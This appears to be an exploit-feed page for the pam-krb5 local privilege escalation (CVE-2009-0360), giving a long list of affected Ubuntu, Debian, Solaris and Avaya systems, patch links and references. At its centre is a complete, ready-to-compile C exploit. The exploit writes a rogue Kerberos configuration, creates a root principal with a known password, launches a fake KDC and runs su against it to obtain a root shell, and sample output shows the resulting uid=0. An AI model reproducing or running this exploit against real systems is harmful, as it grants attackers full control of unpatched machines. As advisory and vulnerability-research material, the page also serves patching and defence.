|
Feeds -
Exploits
|
|
Written by Russ Allbery
|
|
Monday, 30 March 2009 22:06 |
pam-krb5 Local Privilege Escalation Vulnerability
-\\Bugtraq ID:
33740
-\\Class:
Design Error
-\\CVE:
CVE-2009-0360
-\\Remote:
No
-\\Local:
Yes
-\\Published:
Feb 11 2009 12:00AM
-\\Updated:
Mar 30 2009 08:46PM
-\\Credit:
Russ Allbery
-\\Vulnerable:
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 7.10 sparc
Ubuntu Ubuntu Linux 7.10 powerpc
Ubuntu Ubuntu Linux 7.10 lpia
Ubuntu Ubuntu Linux 7.10 i386
Ubuntu Ubuntu Linux 7.10 amd64
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8
Sun Solaris 10_x86
Sun Solaris 10
Sun SEAM 1.0.1
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_81
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_29
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_108
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101a
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01
Sun OpenSolaris 0
Russ Allbery pam-krb5 0
Pardus Linux 2008 0
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Avaya CMS Server 13.0
Avaya CMS Server 15.0
Avaya CMS Server 14.1
Avaya CMS Server 14.0
Avaya CMS Server 13.1
-\\Not Vulnerable:
Russ Allbery pam-krb5 3.13
-\\Discussion
The 'pam-krb5' library is prone to a local privilege-escalation vulnerability
because it fails to properly handle setuid processes.
Local attackers may exploit this issue to gain elevated privileges, which may lead
to a complete compromise of the system.
This issue affects pam-krb5 as shipped with Debian, Ubuntu, and Gentoo Linux
releases; other versions may also be vulnerable.
-\\Exploit(s)/PoC(s):
An exploit is available:
===============================================================
33740.c
^^^^^^^^
/*
* cve-2009-0360.c
*
* pam-krb5 < 3.13 local privilege escalation
* Jon Oberheide <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360
*
* pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly
* initialize the Kerberos libraries for setuid use, which allows local
* users to gain privileges by pointing an environment variable to a
* modified Kerberos configuration file, and then launching a PAM-based
* setuid application.
*
* Usage:
*
* $ gcc cve-2009-0360.c -o cve-2009-0360
* $ ./cve-2009-0360
* [+] creating krb5.conf
* [+] creating kdc.conf
* [+] creating kerberos database
* Loading random data
* Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
* master key name 'K/
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
'
* [+] adding principal
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
* Authenticating as principal
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
with password.
* Enter KDC database master key:
* WARNING: no policy specified for
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
; defaulting to no policy
* Principal "
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
" created.
* [+] launching krb5kdc on 141.212.110.163:6666
* [+] launching su with fake KDC configuration
* [+] enter "root" at the password prompt
* Password:
* # id
* uid=0(root) gid=0(root) ...
*
* Notes:
*
* This exploit will result in local privilege escalation on hosts that use
* the pam-krb5 module for su authentication. Check the su and system-auth
* PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
* Some customization of the defined constants and paths may be necessary
* for your environment. Be sure to set FAKE_KDC_HOST to the IP address of
* an active non-loopback interface on the target machine.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#define REALM "TEST.COM"
#define FAKE_KDC_HOST "141.212.110.163"
#define FAKE_KDC_PORT "6666"
#define PRINCIPAL_NAME "root"
#define PRINCIPAL_PASS "root"
#define TMP_DIR "/tmp/cve-2009-0360"
#define KUTIL_PATH "/usr/sbin/kdb5_util"
#define KADMIN_PATH "/usr/sbin/kadmin.local"
#define KRB5KDC_PATH "/usr/sbin/krb5kdc"
#define KRB5_CONF \
"[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
" = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
"default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
"\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM
#define KDC_CONF \
"[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
" = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
"FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
"\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
"\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"
int
main(void)
{
int ret;
FILE *fp;
char *err;
ret = mkdir(TMP_DIR, 0755);
if (ret == -1 && errno != EEXIST) {
err = "cannot create TMP_DIR";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
printf("[+] creating krb5.conf\n");
sleep(1);
fp = fopen(TMP_DIR "/krb5.conf", "w");
if (!fp) {
err = "cannot open krb5.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);
fclose(fp);
printf("[+] creating kdc.conf\n");
sleep(1);
fp = fopen(TMP_DIR "/kdc.conf", "w");
if (!fp) {
err = "cannot open kdc.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);
fclose(fp);
chdir(TMP_DIR);
printf("[+] creating kerberos database\n");
sleep(1);
ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \
"/stash -r " REALM " -s -P \"\"");
if (WEXITSTATUS(ret) != 0) {
err = "kdb5_util command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
sleep(1);
ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \
" -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \
"-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\"");
if (WEXITSTATUS(ret) != 0) {
err = "kadmin.local command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
sleep(1);
ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \
" -d " TMP_DIR "/principal -r " REALM);
if (WEXITSTATUS(ret) != 0) {
err = "krb5kdc command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] launching su with fake KDC configuration\n");
sleep(1);
printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
sleep(1);
system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");
return 0;
}
-\\Solution
Updates are available. Please see the references for more information.
Debian Linux 4.0 amd64
--Debian libpam-krb5_2.6-1etch1_amd64.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_amd64.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_amd64.deb
Debian Linux 4.0 ia-32
--Debian libpam-krb5_2.6-1etch1_i386.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_i386.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_i386.deb
Debian Linux 4.0 hppa
--Debian libpam-krb5_2.6-1etch1_hppa.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_hppa.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_hppa.deb
Debian Linux 4.0 mipsel
--Debian libpam-krb5_2.6-1etch1_mipsel.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mipsel.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mipsel.deb
Debian Linux 4.0 ia-64
--Debian libpam-krb5_2.6-1etch1_ia64.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_ia64.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_ia64.deb
Debian Linux 4.0 mips
--Debian libpam-krb5_2.6-1etch1_mips.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mips.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mips.deb
Debian Linux 4.0 arm
--Debian libpam-krb5_2.6-1etch1_arm.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_arm.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_arm.deb
Debian Linux 4.0 powerpc
--Debian libpam-krb5_2.6-1etch1_powerpc.deb
http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_powerpc.
dehttp://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_powerpc.deb
-\\Reference(s)
--PAM module for MIT Kerberos
http://packages.debian.org/etch/libpam-krb (Debian)
--pam-krb5 security advisory (3.12 and earlier)
http://www.securityfocus.com/archive/1/50089 (Russ Allbery <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Re: pam-krb5 security advisory (3.12 and earlier)
http://www.securityfocus.com/archive/1/50089 (Tim Skirvin <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--ASA-2009-070 (SUN 252767)
http://support.avaya.com/elmodocs2/security/ASA-2009-070.ht (Avaya)
--Solution 252767: A Security Vulnerability in the Solaris Kerberos PAM Module
http://sunsolve.sun.com/search/document.do?assetkey=1-66-252767- (Sun)
|
